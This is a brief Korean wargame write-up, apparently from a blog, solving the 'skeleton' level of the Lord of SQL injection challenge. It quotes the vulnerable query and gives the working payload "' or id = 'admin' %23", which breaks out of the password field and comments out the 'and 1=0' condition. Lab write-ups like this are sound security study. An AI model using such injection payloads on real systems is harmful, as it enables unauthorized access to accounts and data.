소스코드 분석
if($result['id'] == 'admin') solve("skeleton");
id = 'admin'을 만족하면 풀리는데 뒤에
select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0
and 1=0 이라는 조건이 붙었는데 뒤에는 주석으로 생략을 한다.
?pw=%27%20or%20id%20=%20%27admin%27%20%23
?pw=' or id = 'admin' %23
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] darkknight (0) | 2017.05.28 |
|---|---|
| [Lord of SQL injection] golem (0) | 2017.05.26 |
| [Lord of SQL injection] vampire (0) | 2017.05.25 |
| [Lord of SQL injection] troll (0) | 2017.05.25 |
| [Lord of SQL injection] orge (0) | 2017.05.25 |
